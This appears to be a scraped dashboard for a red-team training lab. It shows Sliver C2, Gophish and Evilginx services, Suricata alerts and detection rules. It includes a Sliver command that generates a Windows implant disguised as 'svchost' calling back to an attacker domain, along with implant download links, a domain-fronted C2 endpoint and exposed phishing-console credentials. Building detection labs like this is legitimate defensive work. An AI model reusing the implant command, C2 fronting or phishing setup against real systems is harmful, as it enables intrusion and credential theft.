91
DAYS REMAINING
00. STATUS
01. SERVICES
02. IDS ALERTS
03. IMPLANTS
04. PLAYBOOKS
05. PHISHING
06. TERMINAL

LIVE // SYSTEM

MEMORY1114MB / 1967MB (57%)
DISK6.8G / 48G
CPU LOAD0.55, 0.33, 0.28
UPTIME0d 0h 39m
IDS RULES9 active
C2 FRONTENDAzure Front Door

// ATTACK SURFACE

LANDINGrh7.ninja
PHISHINGauth.rh7.ninja
C2 (DIRECT)api.rh7.ninja:4443
C2 (FRONTED)edge.rh7.ninja:443
GOPHISHlab.rh7.ninja/gophish
DASHBOARDlab.rh7.ninja

NGINX

STATUS active
PORT443/8443

SLIVER

STATUS active
PORT4443/8080

GOPHISH

STATUS active
PORT3333/8088

EVILGINX2

STATUS on-demand

MITMPROXY

STATUS active
PORT8889

RH7-WEBAPP

STATUS active
PORT5000

LIVE // SURICATA FAST LOG

0.063070SID:1000001 C2 TLS - Sliver beacon on port 4443
0.063070SID:1000008 C2 BEACON - Repeated TLS on port 4443
0.063070SID:1000001 C2 TLS - Sliver beacon on port 4443
0.063070SID:1000008 C2 BEACON - Repeated TLS on port 4443
0.063071SID:1000001 C2 TLS - Sliver beacon on port 4443
0.063676SID:1000001 C2 TLS - Sliver beacon on port 4443
0.063070SID:1000001 C2 TLS - Sliver beacon on port 4443
0.063070SID:1000008 C2 BEACON - Repeated TLS on port 4443
0.063071SID:1000001 C2 TLS - Sliver beacon on port 4443
0.063676SID:1000001 C2 TLS - Sliver beacon on port 4443
0.063071SID:1000001 C2 TLS - Sliver beacon on port 4443
0.063676SID:1000001 C2 TLS - Sliver beacon on port 4443
0.145781SID:1000001 C2 TLS - Sliver beacon on port 4443
0.145781SID:1000008 C2 BEACON - Repeated TLS on port 4443
0.145893SID:1000001 C2 TLS - Sliver beacon on port 4443
0.145781SID:1000001 C2 TLS - Sliver beacon on port 4443
0.145781SID:1000008 C2 BEACON - Repeated TLS on port 4443
0.145893SID:1000001 C2 TLS - Sliver beacon on port 4443
0.145781SID:1000001 C2 TLS - Sliver beacon on port 4443
0.145781SID:1000008 C2 BEACON - Repeated TLS on port 4443
0.145893SID:1000001 C2 TLS - Sliver beacon on port 4443
0.186019SID:1000001 C2 TLS - Sliver beacon on port 4443
0.186019SID:1000001 C2 TLS - Sliver beacon on port 4443
0.186019SID:1000001 C2 TLS - Sliver beacon on port 4443
0.976872SID:1000001 C2 TLS - Sliver beacon on port 4443
0.976872SID:1000008 C2 BEACON - Repeated TLS on port 4443
7.308807SID:1000001 C2 TLS - Sliver beacon on port 4443
7.308807SID:1000008 C2 BEACON - Repeated TLS on port 4443
9.597599SID:1000001 C2 TLS - Sliver beacon on port 4443
9.597599SID:1000008 C2 BEACON - Repeated TLS on port 4443

// DETECTION RULES

# ==============================================
# rh7.ninja C2 DETECTION RULES (CLEAN)
# Only fires on ACTUAL C2 traffic patterns
# ==============================================

# DNS: rh7.ninja domain lookups (the one that always works)
alert dns any any -> any any (msg:"C2 DNS - rh7.ninja domain lookup"; dns.query; content:"rh7.ninja"; classtype:trojan-activity; sid:1000006; rev:1;)

# Sliver C2: repeated TLS beacons from same source (beacon behavior)
alert tls any any -> 143.198.125.30 4443 (msg:"C2 BEACON - Repeated TLS to Sliver port 4443"; flow:to_server,established; threshold:type both, track by_src, count 3, seconds 120; classtype:trojan-activity; sid:1000001; rev:2;)

# Sliver C2: TLS with self-signed multiplayer cert (Sliver default)
alert tls any any -> 143.198.125.30 4443 (msg:"C2 TLS - Sliver self-signed cert detected"; flow:to_server,established; tls.cert_subject; content:"CN=multiplayer"; classtype:trojan-activity; sid:1000007; rev:2;)

# HTTP staging callback
alert http any any -> 143.198.125.30 8080 (msg:"C2 HTTP - Sliver staging on port 8080"; flow:to_server,established; classtype:trojan-activity; sid:1000002; rev:1;)

# Phishing: auth subdomain access
alert http any any -> 143.198.125.30 any (msg:"PHISHING - auth.rh7.ninja access"; http.host; content:"auth.rh7.ninja"; classtype:social-engineering; sid:1000003; rev:1;)

# Implant download: EXE from CDN
alert http any any -> 143.198.125.30 any (msg:"C2 IMPLANT - EXE download from CDN"; http.uri; content:".exe"; http.host; content:"cdn.rh7.ninja"; classtype:trojan-activity; sid:1000004; rev:1;)

# Implant download: ARM binary from CDN
alert http any any -> 143.198.125.30 any (msg:"C2 IMPLANT - ARM binary download"; http.uri; content:"arm-agent"; http.host; content:"cdn.rh7.ninja"; classtype:trojan-activity; sid:1000010; rev:1;)

# Phishing: POST credential submission
alert http any any -> 143.198.125.30 any (msg:"PHISHING - Credential POST to auth"; http.method; content:"POST"; http.host; content:"auth.rh7.ninja"; classtype:social-engineering; sid:1000009; rev:1;)

# Azure Front Door health probe noise filter - suppress
alert tls any any -> 143.198.125.30 443 (msg:"AZURE CDN - Front door health probe"; flow:to_server,established; tls.cert_subject; content:"CN=*.azureedge.net"; threshold:type threshold, track by_src, count 10, seconds 60; classtype:not-suspicious; sid:2000001; rev:1;)

// PAYLOAD DELIVERY

▸ arm-agent 21.0MB ARM64 ⬇ GET
▸ software 4KB x64 ⬇ GET
▸ svchost.exe 32.7MB x64 ⬇ GET

// SLIVER C2 STATUS

SERVERapi.rh7.ninja:4443 | edge.rh7.ninja:443 (Azure)
VERSIONv1.7.3
LISTENERS2
OPERATORS1 (rh7-op)
SESSION IMPLANTS3
Generate implant (Sliver console):
generate --os windows --arch amd64 --name svchost
--lhost edge.rh7.ninja --lport 443 --save implant.exe

PLAYBOOK 1

01 Phishing Killchain

PLAYBOOK 2

02 Ad Attack Chain

PLAYBOOK 3

03 Wifi Audit

PLAYBOOK 4

04 C2 Traffic Engineering

PLAYBOOK 5

05 Suricata Detection

// EXECUTION LOG

No playbook executed yet

LIVE // GOPHISH CAMPAIGN MANAGER

CREDENTIALSadmin / 4c2c4f7c4c5c0479
OPEN GOPHISH →

// WEB TERMINAL

RH7 Lab Terminal — Enter commands below